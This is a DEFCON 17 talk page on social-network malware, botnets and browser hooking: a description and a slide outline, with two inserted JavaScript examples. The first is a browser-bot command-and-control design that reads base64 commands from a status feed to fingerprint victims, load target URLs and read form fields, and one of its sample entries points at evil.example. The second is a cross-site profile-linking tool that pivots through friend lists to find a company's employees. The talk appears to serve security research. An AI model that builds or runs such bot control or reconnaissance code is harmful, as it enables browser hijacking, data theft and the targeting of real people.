
Social Zombies: Your Friends Want to Eat Your Brains

In Social Zombies: Your Friends Want to Eat Your Brains, Tom Eston and Kevin Johnson explore the various concerns related to malware delivery through social network sites. Setting aside the FUD and confusion being sown today, this presentation examines the real risks and then presents tools that can be used to exploit these issues.

This presentation begins by discussing how social networks work and the various privacy and security concerns caused by the mass of trust relationships on which social networks are built. We use this privacy confusion to exploit members and their companies during our penetration tests.

The presentation then discusses typical botnets and bot programs. Both the delivery of this malware through social networks and the use of these social networks as command and control channels will be examined.

Tom and Kevin next explore the use of browser-based bots and their delivery through custom social network applications and content. This research expands upon previous work by researchers such as Wade Alcorn and GNUCitizen and takes it into new C&C directions.

Finally, the information available through the social network APIs is explored using the bot delivery applications. This allows for complete coverage of the targets and their information.

This presentation is the version from the DEFCON 17 CD, not the one we gave live. The full presentation will be posted in a few months, after we give the talk a few more times.


  1. SOCIAL ZOMBIES: Your Friends Want to Eat Your Brains
  2. STARRING...
  3. TOM ESTON
  5. Social Networks “The New Hotness”
  6. 225 Million Users
  7. 110 Million Users
  8. Grew 752% in 2008!
  9. 8 million visitors in March 2009
  10. “Social networks & blogs are now the 4th most popular online activity, ahead of personal email.” - Nielsen Online Report, March 2009
  11. How do socnets make $$?
  12. It’s in your Profile!
      • The more information you share, the more $$ it’s worth!
      • Targeted advertising
      • Selling your demographic info
      • Sketchy privacy/ToS policies...
  13. In Social Networks We Trust...
  14. Trust is Everything!
      • It’s how social networks work
      • The more trust, the better for the socnet!
      • Attackers LOVE trust relationships!
  15. Fake Profiles
  16. It’s Built to Exploit Trust
      • Who is the person behind the account?
      • Bots are everywhere
      • Accounts are easy to create
      • Socnet user verification = FAIL
      • Connections are based on other “friends”
  17. Privacy Concerns
  18. 25 Random Things About You...
      • I’m your friend, I want to know more about you!
      • Innocent?
      • These are PASSWORD RESET QUESTIONS, people!!
  19. Corporate Espionage?
      • Very effective in a penetration test
      • Socnet information = GOLD
      • Information leakage on a mass scale!
  20. Default Privacy Settings
      • Wide open for a reason!
      • Facebook has very good controls... but...
      • Do you know where they are?
      • Do your friends/family?
      • Do they care?
  21. Security Concerns
      • Socnets are the #1 target for malware
      • Spam
      • Disinformation
      • XSS, CSRF and more!
  22. Twitter Clickjacking & XSS
  23. Return of Koobface
      • Recycled exploits
      • Exploits trust
      • STILL EFFECTIVE!
  24. Social Network Bots
  25. Delivery via Socnet API
      • Twitter bots (n0tab0t, Realboy)
      • Automated tools and scripts...
  26. Automated Tools
  27. Pay Services
  28. Social Network Botnets?
  29. Facebot POC
      • Malicious Facebook application (looks normal)
      • Turns your PC into a bot used for DDoS!
  30. Introducing... Kreios C2
  31. Kreios C2 Demo
  32. Browser-Based Bots
  33. Browsers and Features... Oh My!
      • Browsers are getting more feature-rich
      • Read that as more vulnerable!
      • Forget exploiting vulns
      • Abuse the features we are provided
  34. Browser Zombies
      • JavaScript is used to hook the browser
      • Other technologies will work
      • Many frameworks available: BeEF, BrowserRider, Anehta
  35. SocNet Delivery
      • Embedded applications can insert JavaScript
      • Multiple options
      • Hook scripts are pushed
      • Users are redirected to hook sites
      • Why would we allow this!?!?
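To make the browser-bot and social-network C2 material concrete (the botnet, Kreios C2 and browser-zombie slides above, and the C&C-channel point in the description), here is an added example. It is not code from the talk, from Kreios C2, or from BeEF, BrowserRider or Anehta. It simulates a hooked browser that polls a social-network status feed for commands: the `#kz` command tag, the base64-encoded JSON command format, the controller account name, the feed entries and the stand-in browser environment are all constructed assumptions for this illustration, and nothing here touches a network.

```javascript
// Added example, not from the original talk: a simulated browser "zombie"
// that reads its commands from a social-network status feed. The feed, the
// command format and the fake browser environment are all constructed.

// Constructed convention: a status update is a command only if it starts with
// this tag followed by a base64 payload that decodes to JSON {op, args}.
const CMD_TAG = "#kz";
// Constructed controller account; posts from anyone else are ignored so a
// random "friend" cannot take over the bot by posting a well-formed command.
const CONTROLLER = "zombie_master";

// base64 helpers that work in browsers (atob/btoa) and in Node.
function b64decode(s) {
  return typeof atob === "function" ? atob(s) : Buffer.from(s, "base64").toString("utf8");
}
function b64encode(s) {
  return typeof btoa === "function" ? btoa(s) : Buffer.from(s, "utf8").toString("base64");
}

// Extract the ordered list of commands from a feed of {id, user, text} posts.
// Posts that are not from the controller, lack the tag, or fail to decode are skipped.
function parseCommands(feed, controller) {
  const cmds = [];
  for (const post of feed) {
    if (post.user !== controller || !post.text.startsWith(CMD_TAG + " ")) continue;
    try {
      const obj = JSON.parse(b64decode(post.text.slice(CMD_TAG.length + 1)));
      if (typeof obj.op === "string") cmds.push({ id: post.id, op: obj.op, args: obj.args || {} });
    } catch (e) {
      // not a valid command payload; ignore it rather than crash the hook
    }
  }
  return cmds;
}

// The hook's vocabulary: things a hooked browser can do with ordinary browser
// features, no vulnerability required. `env` stands in for window/navigator/
// document so the example runs offline.
const HANDLERS = {
  // fingerprint the victim's browser and current page
  info: (env) => ({ ua: env.userAgent, url: env.location, hasCookies: env.cookie.length > 0 }),
  // load a URL (how a botnet of browsers can be pointed at a target); simulated as a log entry
  fetch: (env, args) => { env.requests.push(args.url); return { fetched: args.url }; },
  // read a value out of the page's DOM, e.g. a form field
  read: (env, args) => ({ value: env.dom[args.selector] ?? null }),
};

// One polling cycle: run every command newer than `lastSeen`, return the
// results that the bot would post back, plus the new high-water mark.
function runHook(feed, controller, env, lastSeen) {
  const results = [];
  let seen = lastSeen;
  for (const cmd of parseCommands(feed, controller)) {
    if (cmd.id <= seen) continue;
    const handler = HANDLERS[cmd.op];
    results.push({ id: cmd.id, op: cmd.op, result: handler ? handler(env, cmd.args) : { error: "unknown op" } });
    seen = cmd.id;
  }
  return { results, lastSeen: seen };
}

// Constructed browser environment (fresh copy per call so runs are independent).
function makeEnv() {
  return {
    userAgent: "Mozilla/5.0 (constructed sample)",
    location: "http://socnet.example/apps/some-game",
    cookie: "sid=deadbeef",
    requests: [],                            // URLs the hook was told to load
    dom: { "#email": "victim@example.com" },
  };
}

// Constructed status feed: ordinary posts, valid commands, and two traps
// (a command posted by a non-controller, and a malformed payload).
const cmdPost = (id, obj) => ({ id, user: CONTROLLER, text: `${CMD_TAG} ${b64encode(JSON.stringify(obj))}` });
const SAMPLE_FEED = [
  { id: 1, user: "alice", text: "25 random things about me..." },
  cmdPost(2, { op: "info" }),
  { id: 3, user: "mallory", text: `${CMD_TAG} ${b64encode(JSON.stringify({ op: "fetch", args: { url: "http://evil.example/" } }))}` },
  cmdPost(4, { op: "fetch", args: { url: "http://target.example/" } }),
  { id: 5, user: CONTROLLER, text: `${CMD_TAG} not-base64-json` },
  cmdPost(6, { op: "selfdestruct" }),
];

console.log(JSON.stringify(runHook(SAMPLE_FEED, CONTROLLER, makeEnv(), 0), null, 2));
```

Two details matter for a practitioner: the bot keys on the controller account and on a decode-and-validate step, so only the posts from id 2, 4 and 6 are acted on (the impersonated post and the malformed one are dropped), and the only "capabilities" used are fetching a URL and reading the DOM, which is exactly the feature abuse the slides describe as needing no exploit.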
  36. Oh Yeah, Mafia Wars
  37. Server-Side Information Collection
  38. Information is Power
      • Information gets us access
      • Social networks are littered with info
      • But how do we connect it together?
  39. Third-Party Apps to the Rescue
      • Third-party apps have access to everything
      • Permissions are open by default
      • Once a user says accept...
  40. APIs FTW
      • MySpace and Facebook both provide access and an API
      • These APIs provide the access we want
      • Allow connecting different users
      • Based on friends, groups, jobs or interests
  41. Social Butterfly
      • Social Butterfly is a third-party application
      • Runs on attacker-controlled servers
      • Collects data from application users
      • Crosses the line between different sites
      • Fine line before violating ToS!
  42. Social Butterfly DEMO
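The server-side collection slides (Information is Power, Third-Party Apps, APIs FTW, Social Butterfly) describe connecting profile data across sites and pivoting through friends, employers and groups. The following added example shows one way to do that correlation; it is not the Social Butterfly code and does not use any real social-network API. The profile records, field names, scoring weights and threshold are constructed assumptions for the illustration.

```javascript
// Added example, not the Social Butterfly code: link the same person across
// two social networks from data an installed third-party app can read, then
// pivot through their friends to other people at a target employer.
// All profiles, field names and weights below are constructed.

// Normalise a free-text field for comparison: lowercase, keep letters,
// digits, '@' and spaces, so "Acme Corp." and "ACME Corp" compare equal.
const norm = (s) => (s || "").toLowerCase().replace(/[^a-z0-9@ ]/g, "").trim();

// Score how likely two profiles from different sites are the same person.
// Weights are illustrative: an email match is near-conclusive on its own,
// while name, employer and location each add partial evidence.
function matchScore(a, b) {
  let score = 0;
  if (a.email && b.email && norm(a.email) === norm(b.email)) score += 0.9;
  if (norm(a.name) === norm(b.name)) score += 0.5;
  if (a.employer && b.employer && norm(a.employer) === norm(b.employer)) score += 0.3;
  if (a.location && b.location && norm(a.location) === norm(b.location)) score += 0.2;
  return Math.min(score, 1);
}

// For each profile on site A, pick the best candidate on site B whose score
// clears `threshold`. A common name alone (0.5) is deliberately not enough.
function linkProfiles(siteA, siteB, threshold = 0.6) {
  const links = [];
  for (const a of siteA) {
    let best = null;
    for (const b of siteB) {
      const score = matchScore(a, b);
      if (score >= threshold && (!best || score > best.score)) best = { a: a.id, b: b.id, score };
    }
    if (best) links.push(best);
  }
  return links;
}

// Merge the friend lists of a linked pair across both sites and return the
// friends who work at `employer`: the pivot a pentester wants for a target company.
// Keys are prefixed "A:" / "B:" so ids from the two sites cannot collide.
function pivotByEmployer(link, siteA, siteB, employer) {
  const a = siteA.find((p) => p.id === link.a);
  const b = siteB.find((p) => p.id === link.b);
  const friendKeys = new Set([
    ...(a.friends || []).map((id) => "A:" + id),
    ...(b.friends || []).map((id) => "B:" + id),
  ]);
  const everyone = [
    ...siteA.map((p) => ({ ...p, key: "A:" + p.id })),
    ...siteB.map((p) => ({ ...p, key: "B:" + p.id })),
  ];
  return everyone
    .filter((p) => friendKeys.has(p.key) && norm(p.employer) === norm(employer))
    .map((p) => p.key);
}

// Constructed sample data: what an installed app on each site might be handed.
const SITE_A = [
  { id: "a1", name: "Jane Doe", email: "jane.doe@acme.example", employer: "ACME Corp", location: "Cleveland, OH", friends: ["a2", "a3"] },
  { id: "a2", name: "Bob Smith", employer: "ACME Corp", location: "Cleveland, OH", friends: ["a1"] },
  { id: "a3", name: "Carol King", employer: "Other Inc", friends: ["a1"] },
];
const SITE_B = [
  { id: "b1", name: "Jane D.", email: "Jane.Doe@acme.example", employer: "Acme Corp.", location: "Cleveland OH", friends: ["b2"] },
  { id: "b2", name: "Dave Lee", employer: "ACME Corp", friends: ["b1"] },
  { id: "b3", name: "Bob Smith", employer: "Widgets LLC", location: "Austin, TX" },
];

const links = linkProfiles(SITE_A, SITE_B);
console.log("linked identities:", links);
for (const link of links) {
  console.log("ACME contacts reachable via", link.a, "/", link.b, ":", pivotByEmployer(link, SITE_A, SITE_B, "ACME Corp"));
}
```

On the constructed data only Jane is linked (email plus employer plus location); the two "Bob Smith" profiles score 0.5 and stay separate, which is the check that keeps a correlation tool from merging strangers who share a name. The pivot then yields one ACME contact from each site through Jane's friend lists, which is the cross-site reach the Social Butterfly slide describes.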
  43. Prevention
      • User education
      • End “opt-in” socnet developer models
      • Control API usage
      • Better account verification
      • Spam throttling
  44. Conclusions
  45. More Information
      • Facebook Privacy & Security Guide: SPYLOGIC.NET
      • Kreios C2
      • New website dedicated to social media security (announced at DEFCON)
  46. Questions for the Zombies?